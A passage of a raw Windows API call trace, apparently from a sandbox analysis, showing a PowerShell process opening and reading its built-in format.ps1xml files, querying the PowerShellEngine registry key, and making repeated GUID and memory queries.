	[0111.894] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.894] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0xe67, lpOverlapped=0x0) returned 1
	[0111.894] ReadFile (in: hFile=0x330, lpBuffer=0x3a9993f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9993f*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.894] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.894] SetErrorMode (uMode=0x1) returned 0x1
	[0111.895] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0111.895] SetErrorMode (uMode=0x1) returned 0x1
	[0111.895] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.895] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.895] CoTaskMemAlloc (cb=0x5a) returned 0x1b8515b0
	[0111.895] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b8515b0, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.895] CoTaskMemFree (pv=0x1b8515b0) 
	[0111.895] RegCloseKey (hKey=0x330) returned 0x0
	[0111.899] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1043f0ac, Data2=0xccea, Data3=0x4f53, Data4=([0]=0x8e, [1]=0xac, [2]=0x65, [3]=0x7d, [4]=0xe4, [5]=0x20, [6]=0xd7, [7]=0x7c))) returned 0x0
	[0111.899] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4a5b6033, Data2=0xd83, Data3=0x48d5, Data4=([0]=0x9f, [1]=0x21, [2]=0x36, [3]=0x35, [4]=0x6e, [5]=0xf6, [6]=0xc3, [7]=0xfe))) returned 0x0
	[0111.899] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x728c00a7, Data2=0xaa76, Data3=0x4583, Data4=([0]=0x95, [1]=0x36, [2]=0x99, [3]=0x62, [4]=0x24, [5]=0x37, [6]=0x66, [7]=0x91))) returned 0x0
	[0111.899] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x979025e6, Data2=0xef5a, Data3=0x410d, Data4=([0]=0xa6, [1]=0x5a, [2]=0xfc, [3]=0x55, [4]=0x2, [5]=0xca, [6]=0x77, [7]=0xc1))) returned 0x0
	[0111.900] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x6346f4e5, Data2=0xf9bc, Data3=0x48eb, Data4=([0]=0xae, [1]=0x9c, [2]=0x37, [3]=0x2b, [4]=0x80, [5]=0xf1, [6]=0x2e, [7]=0x8b))) returned 0x0
	[0111.900] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x44053242, Data2=0x9d6c, Data3=0x411e, Data4=([0]=0x90, [1]=0xe4, [2]=0x78, [3]=0x47, [4]=0x6b, [5]=0xfe, [6]=0xbb, [7]=0x17))) returned 0x0
	[0111.900] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4ff3db62, Data2=0x8861, Data3=0x4382, Data4=([0]=0x8e, [1]=0x37, [2]=0x62, [3]=0x4d, [4]=0x57, [5]=0xe4, [6]=0xf0, [7]=0xed))) returned 0x0
	[0111.900] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.900] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2b80e143, Data2=0xd30, Data3=0x47a4, Data4=([0]=0x89, [1]=0xd5, [2]=0x31, [3]=0x47, [4]=0x5e, [5]=0x69, [6]=0x63, [7]=0xaf))) returned 0x0
	[0111.901] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xb0597f24, Data2=0x207e, Data3=0x4e2c, Data4=([0]=0xad, [1]=0xbf, [2]=0xc7, [3]=0xcf, [4]=0x5d, [5]=0x9, [6]=0xae, [7]=0x43))) returned 0x0
	[0111.901] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x17e3d810, Data2=0x2497, Data3=0x4ae9, Data4=([0]=0x92, [1]=0x28, [2]=0x5b, [3]=0x13, [4]=0xc6, [5]=0xf9, [6]=0xd3, [7]=0xce))) returned 0x0
	[0111.901] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xeb800130, Data2=0x22a3, Data3=0x461b, Data4=([0]=0x84, [1]=0x77, [2]=0x84, [3]=0xcb, [4]=0xb2, [5]=0x1c, [6]=0x5b, [7]=0x22))) returned 0x0
	[0111.901] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4b32a4e5, Data2=0xc9a7, Data3=0x4f29, Data4=([0]=0x83, [1]=0x4e, [2]=0x44, [3]=0x33, [4]=0x26, [5]=0xbe, [6]=0x25, [7]=0xff))) returned 0x0
	[0111.901] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf8e138b7, Data2=0x2de2, Data3=0x4536, Data4=([0]=0x8e, [1]=0xe2, [2]=0xd2, [3]=0x7c, [4]=0x6f, [5]=0xb5, [6]=0xc4, [7]=0xf6))) returned 0x0
	[0111.902] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe9e8f0b7, Data2=0x7e3e, Data3=0x4879, Data4=([0]=0xa9, [1]=0x8a, [2]=0x5e, [3]=0x38, [4]=0xe3, [5]=0x26, [6]=0x46, [7]=0xb2))) returned 0x0
	[0111.902] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x57fcaa70, Data2=0xe22e, Data3=0x42a1, Data4=([0]=0xa8, [1]=0x84, [2]=0xaa, [3]=0x70, [4]=0x8a, [5]=0x2e, [6]=0xd0, [7]=0x3b))) returned 0x0
	[0111.902] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x76fc482, Data2=0x4ca9, Data3=0x4a38, Data4=([0]=0xa5, [1]=0x20, [2]=0xf2, [3]=0x89, [4]=0x9, [5]=0xc9, [6]=0xe4, [7]=0x54))) returned 0x0
	[0111.902] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2354e216, Data2=0xcd3d, Data3=0x4e4f, Data4=([0]=0xb7, [1]=0xbd, [2]=0x7e, [3]=0x5d, [4]=0x29, [5]=0x29, [6]=0x46, [7]=0x6a))) returned 0x0
	[0111.902] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x56eec18d, Data2=0xc7bd, Data3=0x40a3, Data4=([0]=0x97, [1]=0x8e, [2]=0xdd, [3]=0x5b, [4]=0xac, [5]=0x98, [6]=0xac, [7]=0x7a))) returned 0x0
	[0111.903] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x82333016, Data2=0xa209, Data3=0x402a, Data4=([0]=0x85, [1]=0x3c, [2]=0x56, [3]=0x44, [4]=0x6c, [5]=0xe7, [6]=0x45, [7]=0x78))) returned 0x0
	[0111.903] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.903] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.904] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.904] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x41fd3fd8, Data2=0xb2c8, Data3=0x4436, Data4=([0]=0x8e, [1]=0x45, [2]=0x7, [3]=0x4, [4]=0x5e, [5]=0xf1, [6]=0xb9, [7]=0x75))) returned 0x0
	[0111.904] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2c93603e, Data2=0x521b, Data3=0x4fcb, Data4=([0]=0x9d, [1]=0x97, [2]=0xd8, [3]=0x57, [4]=0x4d, [5]=0xe, [6]=0xe9, [7]=0x16))) returned 0x0
	[0111.904] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x7e6bb167, Data2=0xf2e8, Data3=0x4e5d, Data4=([0]=0xbe, [1]=0xbd, [2]=0xce, [3]=0x8f, [4]=0xdc, [5]=0x10, [6]=0x53, [7]=0x3a))) returned 0x0
	[0111.904] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa6e39b34, Data2=0x95dc, Data3=0x4480, Data4=([0]=0x9d, [1]=0xb3, [2]=0x49, [3]=0x61, [4]=0xbf, [5]=0x1d, [6]=0x5f, [7]=0xb9))) returned 0x0
	[0111.905] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x79cbb10a, Data2=0xbddb, Data3=0x4af6, Data4=([0]=0xa8, [1]=0x9e, [2]=0xee, [3]=0xda, [4]=0x27, [5]=0xd9, [6]=0x37, [7]=0x2))) returned 0x0
	[0111.905] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf04baf61, Data2=0xbc82, Data3=0x49f9, Data4=([0]=0xba, [1]=0x76, [2]=0x10, [3]=0x77, [4]=0x4f, [5]=0xcc, [6]=0x59, [7]=0x7b))) returned 0x0
	[0111.905] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfdac99e1, Data2=0x6bb0, Data3=0x4d7f, Data4=([0]=0x97, [1]=0xa4, [2]=0x9d, [3]=0x22, [4]=0x9f, [5]=0xd0, [6]=0xfa, [7]=0xce))) returned 0x0
	[0111.905] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xb3f85e2, Data2=0x276e, Data3=0x4187, Data4=([0]=0xbf, [1]=0xea, [2]=0xd, [3]=0x61, [4]=0xac, [5]=0x24, [6]=0x37, [7]=0xc))) returned 0x0
	[0111.905] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x665c3503, Data2=0xdd34, Data3=0x4e20, Data4=([0]=0xb7, [1]=0x17, [2]=0x24, [3]=0xc, [4]=0x57, [5]=0xe1, [6]=0x31, [7]=0xec))) returned 0x0
	[0111.906] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x791faed, Data2=0x2c52, Data3=0x4cb9, Data4=([0]=0xbf, [1]=0x88, [2]=0xf6, [3]=0xa9, [4]=0x23, [5]=0x91, [6]=0xf6, [7]=0xeb))) returned 0x0
	[0111.906] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x302c7221, Data2=0xe8cb, Data3=0x49e2, Data4=([0]=0x92, [1]=0x43, [2]=0x7d, [3]=0x88, [4]=0xda, [5]=0xf6, [6]=0xc8, [7]=0x3e))) returned 0x0
	[0111.906] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x977148b2, Data2=0xb468, Data3=0x493f, Data4=([0]=0x8a, [1]=0xd8, [2]=0xe7, [3]=0x36, [4]=0x26, [5]=0xe, [6]=0xc9, [7]=0x5e))) returned 0x0
	[0111.906] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x3004232b, Data2=0x152a, Data3=0x4929, Data4=([0]=0x94, [1]=0x6d, [2]=0x44, [3]=0x5f, [4]=0x3c, [5]=0xe4, [6]=0x25, [7]=0xdb))) returned 0x0
	[0111.906] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.907] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x86bb02b0, Data2=0xb725, Data3=0x4656, Data4=([0]=0x9d, [1]=0x63, [2]=0x8, [3]=0xcc, [4]=0x1d, [5]=0x16, [6]=0x6e, [7]=0x78))) returned 0x0
	[0111.907] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.908] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.910] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x787885ad, Data2=0xe4f, Data3=0x475a, Data4=([0]=0x9e, [1]=0xee, [2]=0x94, [3]=0xae, [4]=0x5e, [5]=0xe7, [6]=0xdf, [7]=0xc1))) returned 0x0
	[0111.910] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.910] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x329a939e, Data2=0x3c2b, Data3=0x4a65, Data4=([0]=0xb7, [1]=0xbd, [2]=0xa2, [3]=0x38, [4]=0x1a, [5]=0x82, [6]=0x78, [7]=0xcc))) returned 0x0
	[0111.911] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x7f2aac09, Data2=0xf908, Data3=0x4bf9, Data4=([0]=0x80, [1]=0x39, [2]=0x30, [3]=0xd, [4]=0xbb, [5]=0x34, [6]=0x7a, [7]=0xa))) returned 0x0
	[0111.911] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe342ff1a, Data2=0x79db, Data3=0x408e, Data4=([0]=0x90, [1]=0xf6, [2]=0x9d, [3]=0x51, [4]=0x7, [5]=0xb7, [6]=0x98, [7]=0xcb))) returned 0x0
	[0111.911] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x34cc7839, Data2=0xde7f, Data3=0x432b, Data4=([0]=0xbd, [1]=0x4b, [2]=0x7a, [3]=0x9f, [4]=0xbf, [5]=0xfa, [6]=0x99, [7]=0xdc))) returned 0x0
	[0111.911] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x7322a7a4, Data2=0x72dd, Data3=0x4f7e, Data4=([0]=0x82, [1]=0xe3, [2]=0x75, [3]=0xbc, [4]=0x63, [5]=0xc3, [6]=0x7d, [7]=0x8e))) returned 0x0
	[0111.912] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa85e13f7, Data2=0x9f97, Data3=0x4cbf, Data4=([0]=0xb3, [1]=0x2c, [2]=0x50, [3]=0xe4, [4]=0x7, [5]=0x3a, [6]=0xb6, [7]=0x4c))) returned 0x0
	[0111.912] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x65df7271, Data2=0x5c5a, Data3=0x4101, Data4=([0]=0x9a, [1]=0x83, [2]=0x5e, [3]=0x8d, [4]=0xb7, [5]=0x1f, [6]=0x40, [7]=0x1d))) returned 0x0
	[0111.912] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.912] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4d5bfe25, Data2=0xed02, Data3=0x42c1, Data4=([0]=0xbd, [1]=0xa4, [2]=0x3b, [3]=0xd4, [4]=0x84, [5]=0x4c, [6]=0xab, [7]=0x51))) returned 0x0
	[0111.913] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbf5872e8, Data2=0x9e06, Data3=0x4794, Data4=([0]=0xa4, [1]=0x84, [2]=0xcd, [3]=0x2c, [4]=0x26, [5]=0x9a, [6]=0xba, [7]=0x41))) returned 0x0
	[0111.913] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe82a118, Data2=0xeaf1, Data3=0x4c7d, Data4=([0]=0xa2, [1]=0xe9, [2]=0xf5, [3]=0x3a, [4]=0x75, [5]=0xe3, [6]=0xca, [7]=0x1f))) returned 0x0
	[0111.913] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xeca5e21b, Data2=0xaf90, Data3=0x436d, Data4=([0]=0xa0, [1]=0xfd, [2]=0x75, [3]=0x47, [4]=0x87, [5]=0xea, [6]=0xe, [7]=0x6a))) returned 0x0
	[0111.913] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xdfd7b4f3, Data2=0xc985, Data3=0x49c9, Data4=([0]=0xa6, [1]=0x4e, [2]=0x3a, [3]=0x8d, [4]=0x12, [5]=0x57, [6]=0x61, [7]=0xcc))) returned 0x0
	[0111.914] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.914] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x5dadf77, Data2=0x429a, Data3=0x4b7d, Data4=([0]=0x9f, [1]=0xb7, [2]=0x16, [3]=0x56, [4]=0x76, [5]=0x7e, [6]=0x54, [7]=0xe7))) returned 0x0
	[0111.914] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xac2d0ecc, Data2=0x8ea3, Data3=0x4ac9, Data4=([0]=0x9b, [1]=0x90, [2]=0xdb, [3]=0xb7, [4]=0xc3, [5]=0x68, [6]=0x5c, [7]=0xaf))) returned 0x0
	[0111.914] VirtualQuery (in: lpAddress=0xcbc30, lpBuffer=0xccaf0, dwLength=0x30 | out: lpBuffer=0xccaf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.914] VirtualQuery (in: lpAddress=0xcbc30, lpBuffer=0xccaf0, dwLength=0x30 | out: lpBuffer=0xccaf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.914] VirtualQuery (in: lpAddress=0xcbc30, lpBuffer=0xccaf0, dwLength=0x30 | out: lpBuffer=0xccaf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.915] VirtualQuery (in: lpAddress=0xcbc30, lpBuffer=0xccaf0, dwLength=0x30 | out: lpBuffer=0xccaf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.915] SetErrorMode (uMode=0x1) returned 0x1
	[0111.915] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.915] SetErrorMode (uMode=0x1) returned 0x1
	[0111.915] GetFileType (hFile=0x330) returned 0x1
	[0111.915] ReadFile (in: hFile=0x330, lpBuffer=0x3bf8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3bf8308*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.916] ReadFile (in: hFile=0x330, lpBuffer=0x3bf8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3bf8308*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.917] ReadFile (in: hFile=0x330, lpBuffer=0x3bf8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3bf8308*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.917] ReadFile (in: hFile=0x330, lpBuffer=0x3bf8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3bf8308*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.918] ReadFile (in: hFile=0x330, lpBuffer=0x3bf8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3bf8308*, lpNumberOfBytesRead=0xccf58*=0x8b4, lpOverlapped=0x0) returned 1
	[0111.918] ReadFile (in: hFile=0x330, lpBuffer=0x3bf7724, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3bf7724*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.918] ReadFile (in: hFile=0x330, lpBuffer=0x3bf8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3bf8308*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.918] SetErrorMode (uMode=0x1) returned 0x1
	[0111.918] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0111.918] SetErrorMode (uMode=0x1) returned 0x1
	[0111.918] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.919] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.919] CoTaskMemAlloc (cb=0x5a) returned 0x1b8515b0
	[0111.919] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b8515b0, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.919] CoTaskMemFree (pv=0x1b8515b0) 
	[0111.919] RegCloseKey (hKey=0x330) returned 0x0
	[0111.920] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbf870893, Data2=0x65df, Data3=0x48b0, Data4=([0]=0xbe, [1]=0x2d, [2]=0x57, [3]=0xc1, [4]=0xed, [5]=0x36, [6]=0x9d, [7]=0x61))) returned 0x0
	[0111.920] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x90a45246, Data2=0x6128, Data3=0x4fa3, Data4=([0]=0xb8, [1]=0xc5, [2]=0xb5, [3]=0x49, [4]=0xbc, [5]=0x19, [6]=0x52, [7]=0x27))) returned 0x0
	[0111.921] SetErrorMode (uMode=0x1) returned 0x1
	[0111.921] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.921] SetErrorMode (uMode=0x1) returned 0x1
	[0111.921] GetFileType (hFile=0x330) returned 0x1
	[0111.921] ReadFile (in: hFile=0x330, lpBuffer=0x3c360f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3c360f0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.923] ReadFile (in: hFile=0x330, lpBuffer=0x3c360f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3c360f0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.974] ReadFile (in: hFile=0x330, lpBuffer=0x3c360f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3c360f0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.974] ReadFile (in: hFile=0x330, lpBuffer=0x3c360f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3c360f0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
